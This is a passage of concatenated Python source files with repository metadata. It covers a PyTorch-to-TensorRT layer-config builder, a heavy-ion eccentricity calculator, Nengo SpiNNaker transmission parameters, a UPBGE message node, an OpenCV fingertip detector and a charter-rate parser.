interpolate_params = dict(\n {\n \"layerStyle\": \"resize\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"resizeMode\": resizeMode[mode],\n \"alignCorners\": align_corners,\n \"resizeDim\": size,\n }\n )\n if DEBUG:\n print(interpolate_params)\n js_param = get_parameters()\n js_param[\"network\"].append(interpolate_params)\n INLINE = False\n return x\n\n\n# nn.BathcNorm --> F.batch_norm\ndef _batch_norm(\n raw, input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled\n):\n global INLINE\n x = raw(input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled)\n INLINE = True\n name = log.add_layer(name=\"BN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}.bias\")\n get_weight(running_mean, f\"{name}.running_mean\")\n get_weight(running_var, f\"{name}.running_var\")\n\n # add json params\n weightKey = f\"{name}\"\n bn_params = dict(\n {\n \"layerStyle\": \"bn\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n }\n )\n if DEBUG:\n print(bn_params)\n js_param = get_parameters()\n js_param[\"network\"].append(bn_params)\n INLINE = False\n return x\n\n\n# nn.Sigmoid ---> torch.sigmoid\ndef _sigmoid(raw, input):\n global INLINE\n x = raw(input)\n INLINE = True\n name = log.add_layer(name=\"sigmoid_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weiht to extract\n # add json params\n sigmoid_params = dict(\n {\n \"layerstyle\": \"active\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"active_type\": \"sigmoid\",\n }\n )\n if DEBUG:\n print(sigmoid_params)\n js_param = get_parameters()\n js_param[\"network\"].append(sigmoid_params)\n INLINE = False\n return x\n\n\n# torch.flatten\ndef _flatten(raw, input, start_dim=1, end_dim=-1):\n global INLINE\n x = raw(input, start_dim, end_dim)\n INLINE = True\n name = LayerOut_id[int(id(input))]\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n INLINE = False\n return x\n\n\n# torch.cat\ndef _cat(raw, inputs, dim=0):\n global INLINE\n\n x = raw(inputs, dim)\n INLINE = True\n inputName = []\n for input in inputs:\n inputName.append(log.blobs(input, name=\"cat\"))\n\n name = log.add_layer(name=\"cat_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n cat_params = dict(\n {\n \"layerStyle\": \"concat\",\n \"layerName\": name,\n \"inputName\": inputName,\n \"axis\": dim,\n }\n )\n if DEBUG:\n print(cat_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(cat_params)\n INLINE = False\n return x\n\n\n# F.instance_norm\ndef _instance_norm(\n raw,\n input,\n weight,\n bias,\n running_mean,\n running_var,\n use_input_stats,\n momentum,\n eps,\n torch_backends_cudnn_enabled,\n):\n global INLINE\n x = raw(\n input, weight, bias, running_mean, running_var, use_input_stats, momentum, eps, torch_backends_cudnn_enabled\n )\n INLINE = True\n name = log.add_layer(name=\"IN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}. 
bias\")\n\n # add json params\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n instance_norm_params = dict(\n {\n \"layerStyle\": \"in\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n }\n )\n\n if DEBUG:\n print(instance_norm_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(instance_norm_params)\n INLINE = False\n return x\n\n\n# torch.topk\ndef _topk(raw, input, k, dim=None, largest=True, sorted=True):\n global INLINE\n x = raw(input, k, dim, largest, sorted)\n INLINE = True\n name = log.add_layer(name=\"topk_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n topk_params = dict(\n {\n \"layerStyle\": \"topk\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"TopKOperation\": \"kMAX\" if largest else \"kMIN\",\n \"k\": k,\n \"reduceAxes\": 1,\n \"outputIndex\": 0,\n }\n )\n if DEBUG:\n print(topk_params)\n js_param = get_parameters()\n js_param[\"network\"].append(topk_params)\n INLINE = False\n return x\n\n\n# torch.argmax\ndef _argmax(raw, input, dim, keepdim=False):\n global INLINE\n x = raw(input, dim, keepdim)\n INLINE = True\n name = log.add_layer(name=\"argmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n argmax_params = dict(\n {\n \"layerStyle\": \"argMax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"outputName\": \"argMaxTestout\",\n \"parameter\": {\n \"reShape\": [1, 8, 16],\n \"chooseInde\": dim,\n },\n }\n )\n if DEBUG:\n print(argmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(argmax_params)\n INLINE = False\n return x\n\n\n# torch.div\ndef _div(raw, input, other):\n global INLINE\n x = raw(input, other)\n INLINE = True\n name = log.add_layer(name=\"div_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n div_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kDIV\",\n \"inputName\": [log.blobs(input, name), log.blobs(other, name)],\n }\n )\n if DEBUG:\n print(div_params)\n js_param = get_parameters()\n js_param[\"network\"].append(div_params)\n INLINE = False\n return x\n\n\n# torch.split\ndef _split(raw, tensor, split_size_or_sections, dim=0):\n global INLINE\n x = raw(tensor, split_size_or_sections, dim)\n INLINE = True\n name = log.add_layer(name=\"split_\")\n layerName = []\n start = 0\n slicePoint = [\n start,\n ]\n\n for i in range(len(x)):\n layerName.append(name + \"_idx{}\".format(i + 1))\n log.add_blobs([x[i]], name=layerName[-1])\n LayerOut_id[int(id(x[i]))] = layerName[-1]\n start += len(x[i])\n slicePoint.append(start)\n\n split_params = dict(\n {\n \"layerStyle\": \"slice\",\n \"layerName\": layerName,\n \"inputName\": log.blobs(tensor, name),\n \"axis\": dim,\n \"slicePoint\": slicePoint[:-1],\n }\n )\n if DEBUG:\n print(split_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(split_params)\n INLINE = False\n return x\n\n\n# torch.reshape\ndef _reshape(raw, input, shape):\n global INLINE\n x = raw(input, shape)\n INLINE = True\n name = log.add_layer(name=\"reshape_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n reshape_params = dict(\n {\n \"layerStyle\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": True,\n \"reshapeFirst\": True,\n \"reshape\": shape,\n }\n )\n if DEBUG:\n 
print(reshape_params)\n js_param = get_parameters()\n js_param[\"network\"].append(reshape_params)\n INLINE = False\n return x\n\n\n# _add\ndef _add(input, *args):\n\n if isinstance(args[0], float) or isinstance(args[0], int):\n x = raw__add__(input, *args)\n return x\n\n global INLINE\n x = raw__add__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"add_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n add_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUM\",\n \"inputName\": {\n \"inputName_1\": log.blobs(input, name),\n \"inputName_2\": log.blobs(args[0], name),\n },\n }\n )\n if DEBUG:\n print(\"__add__\")\n print(add_params)\n js_param = get_parameters()\n js_param[\"network\"].append(add_params)\n INLINE = False\n return x\n\n\n# _sub\ndef _sub(input, *args):\n global INLINE\n x = raw__sub__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"sub_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n sub_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUB\",\n \"inputName\": [log.blobs(input, name), log.blobs(args[0], name)],\n }\n )\n\n if DEBUG:\n print(\"__sub__\")\n print(sub_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(sub_params)\n INLINE = False\n return x\n\n\n# expand_as\ndef _expand_as(input, *args):\n global INLINE\n x = raw__expand_as__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"expand_as_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n expand_as_params = dict(\n {\n \"layerStyle\": \"expand\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"expand_as\": log.blobs(args[0], name),\n }\n )\n\n if DEBUG:\n print(\"__expand_as__\")\n print(expand_as_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(expand_as_params)\n INLINE = False\n return x\n\n\ndef _Hwsife(input, *agrs):\n pass\n\n\n# _permute\ndef _permute(input, *args):\n global INLINE\n x = raw__permute__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"permute_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n permute_params = dict(\n {\n \"layerStype\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": False,\n \"reshapeFirst\": False,\n \"reshape\": None,\n \"isPermute\": True,\n \"permute\": args,\n }\n )\n if DEBUG:\n print(\"__permute__\")\n print(permute_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(permute_params)\n INLINE = False\n return x\n\n\nclass RegOp(object):\n \"\"\"\n Registration Operator\n \"\"\"\n\n def __init__(self, raw, replace, **kwargs):\n self.obj = replace\n self.raw = raw\n\n def __call__(self, *args, **kwargs):\n global PLULINE\n if INLINE:\n return self.raw(*args, **kwargs)\n\n else:\n\n for stack in traceback.walk_stack(None):\n flag = True\n state_stack = stack[0]\n # 第一层判断\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n # print(\"module_id: \", module_id)\n break\n\n if 
module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n\n # search upward through the call stack\n while flag:\n state_stack = state_stack.f_back\n if state_stack.f_code.co_name == \"_call_impl\":\n flag = False\n\n # check the frame one level further up\n state_stack = state_stack.f_back\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n break\n\n out = self.obj(self.raw, *args, **kwargs)\n return out\n\n\ndef create_network():\n\n # create the json param\n get_parameters()\n weight_path = os.path.join(cfg.WEIGHTS_DIR, cfg.MODELNAME, cfg.MODELNAME + \".weights\")\n if os.path.exists(weight_path):\n os.remove(weight_path)\n # pad the first line with spaces so that seek can later be used to rewrite the parameter count\n with open(weight_path, \"w\") as file:\n file.write(\"0 \\n\")\n return\n\n\ndef reg_functional_op():\n \"\"\"\n Registration list of all supported torch.nn.functional ops\n \"\"\"\n F.conv2d = RegOp(F.conv2d, _conv2d)\n F.relu = RegOp(F.relu, _relu)\n F.leaky_relu = RegOp(F.leaky_relu, _leaky_relu)\n F.max_pool2d = RegOp(F.max_pool2d, _max_pool2d)\n F.avg_pool2d = RegOp(F.avg_pool2d, _avg_pool2d)\n F.linear = RegOp(F.linear, _linear)\n F.adaptive_avg_pool2d = RegOp(F.adaptive_avg_pool2d, _adaptive_avg_pool2d)\n F.softmax = RegOp(F.softmax, _softmax)\n F.conv_transpose2d = RegOp(F.conv_transpose2d, _conv_transpose2d)\n F.pad = RegOp(F.pad, _pad)\n F.interpolate = RegOp(F.interpolate, _interpolate)\n\n\ndef reg_torch_op():\n \"\"\"\n Registration list of all supported torch ops\n \"\"\"\n torch.batch_norm = RegOp(torch.batch_norm, _batch_norm)\n torch.sigmoid = RegOp(torch.sigmoid, _sigmoid)\n torch.flatten = RegOp(torch.flatten, _flatten)\n torch.cat = RegOp(torch.cat, _cat)\n torch.instance_norm = RegOp(torch.instance_norm, _instance_norm)\n torch.topk = RegOp(torch.topk, _topk)\n torch.argmax = RegOp(torch.argmax, _argmax)\n torch.div = RegOp(torch.div, _div)\n torch.split = RegOp(torch.split, _split)\n torch.reshape = RegOp(torch.reshape, _reshape)\n\n\ndef reg_torch_nn_op():\n \"\"\"\n Registration list of all supported torch.nn ops\n \"\"\"\n # Hsigmoid = RegOp(Hsigmoid, _Hsigmoid)\n\n\ndef reg_tensor_op():\n \"\"\"\n Registration list of all supported tensor ops\n \"\"\"\n for tensor_ in [torch.Tensor]:\n # c = a + b\n tensor_.__add__ = _add\n\n # c = a - b\n tensor_.__sub__ = _sub\n\n # # view (replaced by torch.reshape), permute for [TRT] shuffle layer\n # tensor_.permute = RegTensorOp(tensor_.permute, _permute)\n #\n # # expand_as for [TRT] expand layer\n # tensor_.expand_as = RegTensorOp(tensor_.expand_as, _expand_as)\n\n\ndef reg_plugin_op():\n \"\"\"\n Registration list of all supported plugin ops\n \"\"\"\n pass\n\n\nclass Build:\n \"\"\"\n build the configuration file.\n \"\"\"\n\n def __init__(self, model=None, input_var=None):\n self.model = model\n self.input = input_var\n create_network()\n reg_functional_op() # torch.nn.functional\n reg_torch_op() # torch\n reg_torch_nn_op() # torch.nn\n reg_tensor_op() # torch.Tensor\n reg_plugin_op() # plugin\n\n def build(self):\n\n print(\"starting ...\")\n INLINE = False\n self.model.eval()\n\n log.init([self.input])\n with torch.no_grad():\n output = self.model(self.input)\n INLINE = True\n\n js_param = get_parameters()\n # mark output layer\n if len(output) >= 2:\n for i, out in enumerate(output):\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(out))]:\n js_param[\"network\"][j][\"outputName\"] = f\"{cfg.OUTPUTBLOBNAME}_{i + 1}\"\n\n elif len(output) == 1:\n for j, layer_param in enumerate(js_param[\"network\"]):\n if layer_param[\"layerName\"] == LayerOut_id[int(id(output))]:\n js_param[\"network\"][j][\"outputName\"] = cfg.OUTPUTBLOBNAME\n break\n\n # save json file\n with open(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"), \"w\") as file:\n json.dump(js_param, file, indent=4, ensure_ascii=False)\n\n print(\"succeeded! ...\")\n return\n","repo_name":"tianxin1024/generater","sub_path":"src/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":30171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21902924290","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division\n\nimport numpy as np\n\n__all__ = 'IC',\n\n\nclass IC(object):\n \"\"\"\n Initial condition entropy or energy density profile.\n\n :param array-like profile:\n The IC profile as a block-style grid.\n\n :param dxy:\n Size of each grid cell in fm, either a single value ``dxy = dx = dy``\n or a pair ``dxy = (dx, dy)``.\n :type dxy: float or pair of floats\n\n \"\"\"\n def __init__(self, profile, dxy):\n self._profile = np.asarray(profile, dtype=float)\n\n # save (x, y) steps\n try:\n self._dx, self._dy = dxy\n except (TypeError, ValueError):\n self._dx = self._dy = dxy\n\n # save (x, y) max\n ny, nx = self._profile.shape\n xmax = .5*self._dx*(nx - 1.)\n ymax = .5*self._dy*(ny - 1.)\n self._xymax = xmax, ymax\n\n # calculate and save center of mass\n X = np.linspace(-xmax, xmax, nx)\n Y = np.linspace(ymax, -ymax, ny)\n cm = np.array((\n np.inner(X, self._profile.sum(axis=0)),\n np.inner(Y, self._profile.sum(axis=1))\n ))\n cm /= self._profile.sum()\n self._cm = cm\n\n def sum(self):\n \"\"\"\n Total entropy or energy.\n\n \"\"\"\n return self._profile.sum() * self._dx * self._dy\n\n def cm(self):\n \"\"\"\n Center of mass coordinates, assuming the middle of the profile is\n (0, 0).\n\n \"\"\"\n return self._cm\n\n def ecc(self, n):\n r\"\"\"\n Calculate eccentricity harmonic `\\varepsilon_n`.\n\n :param int n: Eccentricity order.\n\n \"\"\"\n ny, nx = self._profile.shape\n xmax, ymax = self._xymax\n xcm, ycm = self._cm\n\n # create (X, Y) grids relative to CM\n Y, X = np.mgrid[ymax:-ymax:1j*ny, -xmax:xmax:1j*nx]\n X -= xcm\n Y -= ycm\n\n # create grid of weights = profile * R^n\n Rsq = X*X + Y*Y\n if n == 1:\n W = np.sqrt(Rsq, out=Rsq)\n elif n == 2:\n W = Rsq\n else:\n if n & 1: # odd n\n W = np.sqrt(Rsq)\n else: # even n\n W = np.copy(Rsq)\n # multiply by R^2 until W = R^n\n for _ in range(int((n-1)/2)):\n W *= Rsq\n W *= self._profile\n\n # create grid of e^{i*n*phi} * W\n i_n_phi = np.zeros_like(X, dtype=complex)\n np.arctan2(Y, X, out=i_n_phi.imag)\n i_n_phi.imag *= n\n exp_phi = np.exp(i_n_phi, out=i_n_phi)\n exp_phi *= W\n\n return abs(exp_phi.sum()) / W.sum()\n","repo_name":"Duke-QCD/hic","sub_path":"hic/initial.py","file_name":"initial.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"2471709195","text":"import numpy\nfrom spinn_utilities.overrides import overrides\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n abstract_transmission_parameters import AbstractTransmissionParameters\nfrom nengo_spinnaker_gfe.connection_parameters. \\\n pass_through_node_transmission_parameters import \\\n PassthroughNodeTransmissionParameters\nfrom nengo_spinnaker_gfe.nengo_exceptions import \\\n NotConcatableTransmissionParameter\nfrom nengo_spinnaker_gfe.utility_objects.parameter_transform import \\\n ParameterTransform\nfrom nengo_spinnaker_gfe.connection_parameters.\\\n transmission_parameters_impl import TransmissionParametersImpl\n\ntry:\n from xxhash import xxh64 as fasthash\nexcept ImportError: # pragma: no cover\n from hashlib import md5 as fasthash\n import warnings\n warnings.warn(\"xxhash not installed, falling back to md5. \"\n \"Install xxhash to improve build performance.\", UserWarning)\n\n\nclass EnsembleTransmissionParameters(\n TransmissionParametersImpl, AbstractTransmissionParameters):\n \"\"\"Parameters describing information transmitted by an ensemble.\n\n Attributes\n ----------\n decoders : ndarray\n A matrix describing a decoding of the ensemble (sized N x D).\n learning_rule :\n Learning rule associated with the decoding.\n \"\"\"\n\n __slots__ = [\n #\n \"_decoders\",\n #\n \"_learning_rule\"]\n\n def __init__(self, decoders, transform, learning_rule=None):\n AbstractTransmissionParameters.__init__(self)\n TransmissionParametersImpl.__init__(self, transform)\n\n # Copy the decoders into a C-contiguous, read-only array\n self._decoders = numpy.array(decoders, order='C')\n self._decoders.flags[transform.FLAGS_NAME] = False\n\n # Store the learning rule\n self._learning_rule = learning_rule\n\n def __repr__(self):\n return \"{}:{}:{}\".format(\n self._transform, self._decoders, self._learning_rule)\n\n def __str__(self):\n return self.__repr__()\n\n @property\n def decoders(self):\n return self._decoders\n\n @property\n def learning_rule(self):\n return self._learning_rule\n\n @overrides(TransmissionParametersImpl.__eq__)\n def __eq__(self, other):\n # Two connection_parameters are equal only if they are of the same\n # type, and are equivalent in all other\n # fields.\n return (super(EnsembleTransmissionParameters, self).__eq__(other) and\n numpy.array_equal(self._decoders, other.decoders) and\n self._learning_rule == other.learning_rule)\n\n @overrides(TransmissionParametersImpl.__hash__)\n def __hash__(self):\n return hash((type(self), self._learning_rule, self._transform,\n fasthash(self._decoders).hexdigest()))\n\n @overrides(AbstractTransmissionParameters.concat)\n def concat(self, other):\n \"\"\"Create new connection connection_parameters which are the result of\n concatenating this connection with others.\n\n Parameters\n ----------\n other : PassthroughNodeTransmissionParameters\n Connection connection_parameters to add to the end of this connection.\n\n Returns\n -------\n EnsembleTransmissionParameters or None\n Either a new set of transmission connection_parameters, or None if the\n resulting transform contained no non-zero values.\n \"\"\"\n\n if not isinstance(other, PassthroughNodeTransmissionParameters):\n raise NotConcatableTransmissionParameter()\n\n # Get the outgoing transformation\n new_transform = self._transform.concat(other.transform)\n\n # Create a new connection (unless the resulting transform is empty,\n # in which case don't)\n if new_transform is not None:\n return EnsembleTransmissionParameters(\n self._decoders, 
new_transform, self._learning_rule\n )\n else:\n # The transform consisted entirely of zeros so return None.\n return None\n\n @property\n @overrides(TransmissionParametersImpl.as_global_inhibition_connection)\n def as_global_inhibition_connection(self):\n \"\"\"Construct a copy of the connection with the optimisation for global\n inhibition applied.\n \"\"\"\n assert self.supports_global_inhibition\n transform = self.full_transform(slice_out=False)[0, :]\n\n return EnsembleTransmissionParameters(\n self._decoders,\n ParameterTransform(\n size_in=self._decoders.shape[0], size_out=1,\n transform=transform, slice_in=self._transform.slice_in)\n )\n\n @property\n def full_decoders(self):\n \"\"\"Get the matrix corresponding to a combination of the decoders and\n the transform applied by the connection.\n \n @:return numpy array\n @:rtype numpy.array\n \"\"\"\n return numpy.dot(self.full_transform(slice_in=False, slice_out=False),\n self._decoders)\n","repo_name":"SpiNNakerManchester/NengoSpiNNaker","sub_path":"nengo_spinnaker_gfe/connection_parameters/ensemble_transmission_parameters.py","file_name":"ensemble_transmission_parameters.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25821522510","text":"from uplogic.nodes import ULActionNode\nfrom bge.types import KX_GameObject\nfrom bge.logic import sendMessage\nfrom uplogic.nodes import ULOutSocket\n\n\nclass ULSendMessage(ULActionNode):\n def __init__(self):\n ULActionNode.__init__(self)\n self.condition = None\n self.from_obj = None\n self.to_obj = None\n self.subject = None\n self.body = None\n self.done = False\n self.OUT = ULOutSocket(self, self.get_out)\n\n def get_out(self):\n return self.done\n\n def evaluate(self):\n self.done = False\n if not self.get_input(self.condition):\n return\n from_obj: KX_GameObject = self.get_input(self.from_obj)\n to_obj: KX_GameObject = self.get_input(self.to_obj)\n subject = self.get_input(self.subject)\n body = self.get_input(self.body)\n sendMessage(\n subject,\n body,\n to_obj.name if to_obj else '',\n from_obj.name if from_obj else ''\n )\n self.done = True\n","repo_name":"UPBGE/uplogic","sub_path":"uplogic/nodes/actions/sendmessage.py","file_name":"sendmessage.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"49838238036","text":"import numpy as np\r\nimport cv2\r\nimport os\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dirr = './images'\r\n images = []\r\n # loop over the folder and insert each image to the list created above. \r\n for pic in os.listdir(dirr):\r\n img = cv2.imread(os.path.join(dirr,pic))\r\n if img is not None:\r\n images.append(img)\r\n \r\n for i in range(len(images)):\r\n # convert to gray, blur find edges\r\n gray = cv2.cvtColor(images[i],cv2.COLOR_BGR2GRAY)\r\n gray = cv2.medianBlur(gray, 7)\r\n gray=255-gray\r\n gray = cv2.normalize(gray, gray, 0, 255, cv2.NORM_MINMAX) \r\n gray = cv2.Canny(gray,90,110)\r\n kernel = np.ones((5,5),np.uint8)\r\n gray = cv2.dilate(gray,kernel,iterations = 1)\r\n rows = gray.shape[0]\r\n # now find circles or semi circles in the pictures which are the fingers \r\n circles = cv2.HoughCircles(gray, cv2.HOUGH_GRADIENT, 1.1, rows / 8,\r\n param1=30, param2=20,\r\n minRadius=1, maxRadius=30)\r\n if circles is not None:\r\n circles = np.uint16(np.around(circles))\r\n for j in circles[0, :]:\r\n center = (j[0], j[1])\r\n radius = j[2]\r\n cv2.circle(images[i], center, 3, (255, 0, 0), 3)\r\n \r\n\r\n\r\n\r\n plt.imshow(images[i])\r\n plt.title(i+1)\r\n plt.tight_layout()\r\n plt.show()","repo_name":"JameelSi/HandDetector","sub_path":"projectIM2021_1.py","file_name":"projectIM2021_1.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"44240348130","text":"# -*- coding: utf-8 -*-\n\nEAST_ZONES = ['east', 'feast', 'f.east']\n\n\ndef parse_arrival_zones(raw_arrival_zone):\n \"\"\"Split the raw arrival zones into a list of arrival zones, separated by '-'.\n\n Args:\n raw_arrival_zone (str):\n\n Returns:\n list(str)\n\n \"\"\"\n raw_arrival_zones = raw_arrival_zone.split('-')\n raw_arrival_zones_treated = []\n for zone in raw_arrival_zones:\n if any(zone.lower() == east_zone for east_zone in EAST_ZONES):\n raw_arrival_zones_treated.append('Eastern Asia')\n else:\n raw_arrival_zones_treated.append(zone)\n return raw_arrival_zones_treated\n\n\ndef create_voyage_raw_text(departure, arrival):\n \"\"\"From the origin and arrival zones, create the voyage raw text on the following form:\n departure/arrival.\n\n Args:\n departure (str):\n arrival (str):\n\n Returns:\n str\n\n Examples:\n >>> create_voyage_raw_text('foo', 'bar')\n 'foo/bar'\n >>> create_voyage_raw_text('foo', ['france', 'spain'])\n 'foo/france-spain'\n\n \"\"\"\n # in case we receive several arrivals instead of a single string\n if isinstance(arrival, list):\n arrival = '-'.join(arrival)\n\n return '/'.join([departure, arrival])\n\n\ndef parse_rate(rate, quantity=1):\n \"\"\"Try to parse human conventions for charter rates.\n\n Glossary:\n - PD: Per Day\n - WS: World Scale\n\n Examples:\n List of supported fomrmats.\n\n >>> parse_rate('17K PD')\n '17K PD'\n >>> parse_rate('550k')\n 550000.0\n >>> parse_rate('1.85M')\n 1850000.0\n >>> parse_rate('3.3 M')\n 3300000.0\n >>> parse_rate('435000lumpsum')\n 435000.0\n >>> parse_rate('USD 1,86M')\n 1860000.0\n >>> parse_rate('WS40')\n 40.0\n >>> parse_rate('WS 137,5')\n 137.5\n >>> parse_rate('USD 70 PT', 1000)\n 70000.0\n >>> # '-' or '/' seperated values mean it will depend from the\n >>> # destination, hence we cannot decide at this point\n >>> parse_rate('WS58.75/60.75')\n\n >>> parse_rate('USD12,5MT')\n\n >>> parse_rate('RNR')\n\n >>> parse_rate('OWN PROG')\n\n >>> parse_rate('WS25-23(CC/SS)')\n\n >>> parse_rate('US$1.8-2.3M')\n\n Args:\n rate (str):\n quantity (int):\n\n Return:\n float\n\n \"\"\"\n # don't process\n # TODO investigate why we don't need to process this one\n # TODO: ev: we should add tests for this function\n if 'PD' in rate:\n return rate\n\n # we can't do much with that (RNR means Rate Not Reported for rxample, and\n # we don't yet support USD12,5MT)\n if rate in ['RNR', 'COA', 'OWN PROG', 'OWN'] or 'MT' in rate:\n return None\n\n # clean up and normalize\n rate = rate.upper().strip().replace(' ', '')\n\n # Remove currency, since we distinguish rates and dollar prices using the order of magnitude.\n # do it before the rate_coeff choice since 'M' is in 'LUMPSUM'.\n for currency in ['LUMPSUM', 'US$', 'USD']:\n rate = rate.replace(currency, '')\n\n coeff = _choose_rate_coeff(rate, quantity) or 1.0\n # Now that we have the rate coefficient, remove coeff substring.\n for coeff_string in ['PT', 'M', 'K']:\n rate = rate.replace(coeff_string, '')\n\n if rate.startswith('W'):\n rate = _clean_ws_rate(rate)\n\n if '-' in rate or '/' in rate:\n return None\n\n # finally, the actual parsing\n return to_digit(rate) * coeff\n\n\ndef to_digit(value):\n \"\"\"\"Parse a numerical string to return a float.\n\n Args:\n value(str): human style float. 
See example for supported format\n\n Returns:\n float: parsed float value\n\n Raises:\n ValueError: If the given str wasn't a float\n\n Examples:\n Here is a list of illustrations of the format supported.\n\n >>> to_digit('3.3')\n 3.3\n >>> to_digit('1,2')\n 1.2\n >>> to_digit('3,3 M')\n 3300000.0\n >>> to_digit('4k')\n 4000.0\n >>> to_digit('foo') # doctest: +IGNORE_EXCEPTION_DETAIL\n Traceback (most recent call last):\n ...\n ValueError: could not convert string to float: FOO\n\n \"\"\"\n # remove space and normalize digit symbol\n value = value.upper().replace(' ', '').replace(',', '.')\n\n if 'M' in value:\n return float(value.replace('M', '')) * 1e6\n elif 'K' in value:\n return float(value.replace('K', '')) * 1e3\n else:\n return float(value)\n\n\ndef _clean_ws_rate(rate):\n for dirty in ['WS', 'W', '/RNR', '(CC/SS)']:\n rate = rate.replace(dirty, '')\n\n # TODO probably need to check the use-case and the implementation\n if ',' in rate and '/' in rate:\n # case: WS 32/35.5, 35/38.5 => 32/38.5\n partials = rate.split(',')\n partials = [r.split() for r in partials]\n partials = [item for r in partials for item in r]\n rate = '/'.join([partials[0], partials[-1]])\n\n return rate\n\n\ndef _choose_rate_coeff(rate, quantity=None):\n \"\"\"Convert human-formatted numeric abbreviations.\n\n Args:\n rate (str): human-like numeric\n quantity (int): ?????? (@seb)\n\n Returns:\n float: numeric translation of the given raw input\n\n Example:\n\n >>> _choose_rate_coeff('30K')\n 1000.0\n >>> _choose_rate_coeff('30M')\n 1000000.0\n >>> # 